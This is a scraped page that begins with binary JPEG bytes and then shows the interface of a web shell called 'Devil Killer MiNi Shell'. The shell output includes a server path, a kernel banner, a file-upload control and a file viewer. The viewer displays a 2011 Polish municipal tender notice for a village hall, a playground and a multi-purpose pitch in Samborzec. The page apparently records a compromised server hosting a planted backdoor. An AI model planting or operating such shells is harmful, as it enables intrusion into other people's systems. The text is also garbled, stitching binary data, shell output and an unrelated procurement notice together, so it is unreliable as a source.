JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110603/143090-N-2011.html

<p class="kh_header"><b>Samborzec: Poprawa jakości życia mieszkańców oraz zwiększenie atrakcyjności miejscowości Bogoria Skotnicka poprzez remont i wyposażenie świetlicy wiejskiej, budowę boiska wielofunkcyjnego i placu zabaw oraz wykonanie miejsc postojowych i stanowiska na grill</b><br>
<b>Numer ogłoszenia: 143090 - 2011; data zamieszczenia: 03.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Samborzec , Samborzec 43, 27-650 Samborzec, woj. świętokrzyskie, tel. 015 8314443, faks 015 8314583.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.samborzec.asi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa jakości życia mieszkańców oraz zwiększenie atrakcyjności miejscowości Bogoria Skotnicka poprzez remont i wyposażenie świetlicy wiejskiej, budowę boiska wielofunkcyjnego i placu zabaw oraz wykonanie miejsc postojowych i stanowiska na grill.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania: 
Poprawa jakości życia mieszkańców oraz zwiększenie atrakcyjności miejscowości Bogoria Skotnicka poprzez remont i wyposażenie świetlicy wiejskiej, budowę boiska wielofunkcyjnego i placu zabaw oraz wykonanie miejsc postojowych i stanowiska na grill.
CZĘŚĆ 1 Remont i wyposażenie świetlicy wiejskiej, budowa placu zabaw oraz wykonanie miejsc postojowych i stanowiska na grill
Zakres robót obejmuje wykonanie: 
ROBOTY WEWNĄTRZ BUDYNKU: 
Podczas wykonywania remontu pomieszczeń, przewiduje się wykonanie: 
- wydzielenie pomieszczenia gospodarczego, korytarza i wc dla niepełnosprawnych, poprzez wykonanie ścianek działowych z płyt gipsowo-kartonowych typu GKBI typu H2 firmy Norgips lub równoważnej (zielonych). Czyszczenie podłogi z desek poprzez szlifowanie a następnie trzykrotne pomalowanie desek lakierem bezbarwnym, 
- licowanie ścian wc (do wys. 2,0 m) oraz ściany w obrębie umywalki w pomieszczeniu socjalnym ( fartuch 1,5*1,5 ), płytkami glazurowanymi o wym. 20*25 cm na zaprawie klejowej z listwami wykończeniowymi, 
- wykonanie rozbiórki podłóg w pomieszczeniu, w którym zaplanowano wc, pomieszczenie gospodarcze i korytarz a także w pomieszczeniu socjalnym; po wykonaniu rozbiórki j.w. należy wykonać podbudowę pod posadzkę: warstwa gruzobetonu  gr. 15 cm, izolacja cieplna styropianem gr. 5 cm, folia izolacyjna, warstwa wyrównawcza gr. 5 cm. 
- ułożenie płytek gresowych 30*30 antypoślizgowych R 9 na posadzkach na zaprawie klejowej w pomieszczeniach: wc, gospodarczym, socjalnym, korytarzu i w klatce schodowej, ułożenie cokolików z płytek cokołowych ww. wymienionych pomieszczeniach, 
- wymianę stolarki okiennej drewnianej na PCV pięciokomorową i stolarki drzwiowej drewnianej na drewnianą, 
- malowanie we wszystkich pomieszczeniach ścian i sufitów farbą emulsyjną w kolorze uzgodnionym z Inwestorem, w poszczególnych pomieszczeniach należy pomalować lamperie farbą olejną w kolorze uzgodnionym z Inwestorem. 
REMONT BUDYNKU NA ZEWNĄTRZ: 
Projektuje się wymianę pokrycia dachu z blachy płaskiej montowanej na rąbek na blachę trapezową ( mały trapez), wymianę obróbek blacharskich ocynkowanych na powlekane w tym blachy podrynnowej, rynien i rur spustowych. 
Po wykonaniu rozbiórki pokrycia dachu należy rozebrać łaty i zamontować nowe łaty, ułożyć kontrłaty, ułożyć membranę dachową a następnie blachę o małym trapezie. 
Na kominach należy wykonać tynki cementowo - wapienne i pomalować je farbą emulsyjną 3-krotnie oraz poprawić nakrywy na kominach. 
Po wymianie okien należy wykonać podokienniki z blachy powlekanej. 
INSTALACJA SANITARNA: 
Po wydzieleniu pomieszczenia wc oraz w pomieszczeniu socjalnym, rurami z polipropylenu należy doprowadzić wodę do zlewozmywaka, ubikacji i umywalki, a odprowadzenie ścieków wykonać rurami z PCV do pierwszej studzienki. 
Przyłącze kanalizacji sanitarnej, zbiornik nieczystości ciekłych i przyłącze wodociągowe będzie wykonane wg odrębnego opracowania. 
INSTALACJA ELEKTRYCZNA: 
W wydzielonych pomieszczeniach należy wykonać instalację elektryczną a w istniejących pomieszczeniach należy wymienić oprawy oświetleniowe. 
Po wykonaniu wymiany pokrycia dachu planuje się wykonać instalację odgromową. 
WYPOSAŻENIE ŚWIETLICY
1/ stół do tenisa stołowego - kolor niebieski, stół do użytku wewnątrz pomieszczeń, rozmiar 2740x1525x760 mm, płyta z drewna 19 mm, konstrukcja 36 mm, nogi 25x25 mm, możliwość przemieszczenia stołu, wyposażenie w 4 kółeczka, złożenie umożliwia grę jednego gracza, wyprodukowany zgodnie z normą EN 14468-1 Klasa B, stół powinien być wyposażony w uchwyty na siatkę oraz siatkę a także uchwyty na rakietki i piłeczki, sztuk - 1.
2/ stół do bilarda - o wymiarach min. 120 x 250 cm, pole gry z płyty kamiennej, sukno niebieskie o zwiększonym poziomie  poliestru (65%), 24 miesięcy gwarancji, metalowe nogi z możliwością regulacji, w zestawie pełny komplet do gry: 2 kije, 16 bil, 2 kredy, trójkąt, szczotka do sukna, odporny na wilgoć, kosze wykonane z wysokiej jakości eko-skóry, sztuk - 1.
3/ piłkarzyki - o wymiarach 139,2x75,6x86 cm, płyty boczne: 15 mm MDF szeroka na 35 cm, pole gry 118x68 cm z 9mm płyty MDF, punktacja manualna, 22 zawodników, 3 piłeczki w komplecie, drążki zawodników 16 mm chromowana stal, łożyska kulkowe, nogi: 11,8x11,8 z 12 milimetrowej płyty MDF, stopki z regulacją poziomu, sztuk - 1.
4/ lotki - tarcza z kompletem lotek, sztuk - 2.
5/ rakiety do tenisa ziemnego - amatorska, materiał: grafit, pow. min. 660 cm2, waga min. 265 g, sztuk - 4.
6/ wieża muzyczna - o mocy min. 2x50 W, w skład wchodzi: radio cyfrowe z RDS, odtwarzacz CD, standardy odtwarzania dźwięku: CD Audio, CD-R, CD-RW, MP3, WMA, magnetofon, kolor obudowy: srebrny, antena AM / FM, instrukcja obsługi w języku polskim, karta gwarancyjna, pilot,  sztuk - 1.
7/ stoliki świetlicowe - o wymiarach min. 80 cm x 80 cm, wytrzymała metalowa konstrukcja ramy, z rurki o przekroju min. fi 32 mm, lakierowana w kolorze czarnym lub stalowym, blat z płyty laminowanej o grubości min. 18 mm, w kolorze buk, okleinowanej PCV o grubości 2 mm, stopki plastikowe zabezpieczające podłoże przed porysowaniem, sztuk - 10.
8/ krzesła - typu Iso Black /lub równoważny/- wytrzymała metalowa konstrukcja ramy lakierowana w kolorze czarnym, tapicerowane siedzisko i oparcie w kolorze stalowym, sztuk - 40.
9/ szafa - trzydrzwiowa, zamykana, wykonana z  płyty wiórowej o grubości 1.8 cm,  melaminowanej, o podwyższonej trwałości, podwyższonej odporności na ścieranie. Wszystkie krawędzie elementów płytowych mebla (również niewidoczne) zabezpieczone doklejką z tworzywa sztucznego o grubości 2 mm, sztuk - 1.

WYKONANIE MIEJSC POSTOJOWYCH I STANOWISKA NA GRILL:
- STANOWISKA POSTOJOWE w tym: roboty ziemne, wykonanie podbudowy z piasku, z kruszywa i grysu oraz nawierzchni z kostki betonowej gr. 8 cm. 
- MIEJSCE GRILLOWANIA w tym: roboty ziemne, wykonanie podbudowy z piasku, z kruszywa i grysu, nawierzchni z kostki betonowej gr. 6 cm oraz wykonanie trawników. 
- WYPOSAŻENIE MIEJSCA GRILLOWANIA w ławki, stoły, grill, kosz. 

PLAC ZABAW
Będzie to teren o powierzchni 416m2 i nawierzchni trawiastej. Projektuje się ogrodzenie z drewnianych płotków - płotek kaliski średni PŁOJKAL 70 prod Inter-Flora Wrocław /lub równoważne/. Ogrodzenie będzie montowane do metalowych słupków kotwionych w betonowych fundamentach z betonu B-15 w rozstawie co 2 m. Fundamenty o wymiarach 25*25*25cm. Wyposażenie placu zabaw prod. Inter-Flora Wrocław / lub równoważne/ w tym: 
- tablica informacyjna TR1- l szt; 
- kosz na śmieci KOSZ/DR - 2szt; 
- ławka Ł2000 - 2 szt; 
- piaskownica PIAS/B - 1szt 
- huśtawka wagowa SHW SK1 - lszt; 
- huśtawka sprężynowa - 1szt; 
- zestaw zabawowy TOMEK - 1 szt 
- huśtawka podwójna SH2 - lszt; 
Urządzenia zabawowe zostaną złożone na miejscu budowy z modułów fabrycznych producenta i przytwierdzone do podłoża do marek montażowych zakotwionych w fundamentach betonowych przy pomocy śrub montażowych.
CZĘŚĆ 2 Budowa boiska wielofunkcyjnego
BOISKO WIELOFUNKCYJNE z przeznaczeniem do koszykówki/siatkówki i tenisa ziemnego, obejmuje wykonanie: 
a/ PODBUDOWA nieprzepuszczalna o przekroju: 
- grunt rodzimy, 
- warstwa odsączająca z piasku gr. 15 cm,
- podbudowa z betonu B 25 gr. 15 cm. 
Podbudowę należy oddzielić od pozostałych elementów terenu za pomocą obrzeży betonowych o wym. 8x30x100 cm ustawio?nych na ławie betonowej z betonu B 20 z oporem. 
Warstwa odsączająca z piasku powinna być układana warstwowo z bardzo starannym ubijaniem i nawilżaniem piasku. Na ubi?tej warstwie piasku należy układać beton pochodzący z betoniarni z wymaganymi atestami. 
Podłoże z betonu powinno być wolne od zanieczyszczeń organicznych kurzu, błota, piasku itp. a następnie zaimpregnowane impregnatem poliuretanowym np. CONIPUR 74 lub równoważnym. 
Impregnat ma za zadanie stworzenia warstwy adhezyjnej i związanie luźnych cząsteczek podłoża. Podbudowa powinna być szorstka, nie posiadać odspojonych odłamków. 
Na płycie boiska należy wyprofilować dwustronny 0,7 % spadek. 
b/ NAWIERZCHNIA
Projektuje się nawierzchnię syntetyczną, poliuretanową,  bezspoinową, antypoślizgową, przepuszczalną dla wody, gdzie nawierzchnia składa się z warstwy nośnej z granulatu SBR o granulacji 1-4mm oraz warstwy użytkowej z systemu poliuretanowego z granulatem typu EPDM , gr. 2-3mm. Łączna grubość nawierzchni 13mm. W KOLORZE CEGLASTYM. 
Łączna grubość nawierzchni 13 mm. 
c/ WYPOSAŻENIE BOISK slupki do siatkówki / słupki do siatkówki i tenisa z siatkami oraz stojaki do koszykówki z tablicą epoksydową, obręczą i siatką łańcuchową. 
d/ OGRODZENIE z siatki stalowej powlekanej z bramą stalowa z kształtowników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.30.00-7, 45.21.22.00-8, 45.21.21.40-9, 45.23.32.00-1, 45.11.27.10-5, 45.26.23.00-4, 45.23.32.60-9, 45.34.20.00-6, 45.11.12.00-0, 45.44.21.00-8, 45.44.00.00-3, 45.43.00.00-0, 45.42.11.00-5, 45.31.00.00-3, 45.33.20.00-3, 45.31.23.11-0, 45.45.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jedną robotę budowlaną o wartości min. 300 000,00 zł  i polegającą na budowie, przebudowie lub remoncie obiektów użyteczności publicznej wraz z zagospodarowaniem terenu wokół obiektu dla części nr 1, min. 150 000,00 zł i polegającą na budowie boiska sportowego wielofunkcyjnego dla części nr 2  oraz wykaże, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli osoby, które będą uczestniczyć w wykonywaniu zamówienia jako kierownicy robót budowlanych, posiadają wymagane uprawnienia ogólnobudowlane do kierowania robotami budowlanymi bez ograniczeń, upoważniające do wykonywania samodzielnej funkcji kierownika budowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli:
- w stosunku do wykonawcy nie otwarto likwidacji lub nie ogłoszono jego upadłości, chyba że po ogłoszeniu upadłości wykonawca zawarł układ zatwierdzony prawomocnym wyrokiem sądu, a układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego
- wykonawca nie zalega z opłacaniem podatków lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
- wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
- wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia w wysokości min. 
100 000,00 zł,  na jedno lub wszystkie zdarzenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przepisów prawa lub przedstawionych dokumentów rejestrowych; - pełnomocnictwo do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy, jeżeli wykonawcy wspólnie ubiegają się o udzielenie zamówienia; - pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów (wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych) na okres korzystania z nich przy wykonywaniu zamówienia- w sytuacji polegania przez Wykonawcę na zasobach innych podmiotów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.samborzec.asi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Samborcu
Samborzec 43
27-650 Samborzec
pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2011 godzina 11:00, miejsce: Urząd Gminy w Samborcu
Samborzec 43
27-650 Samborzec
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




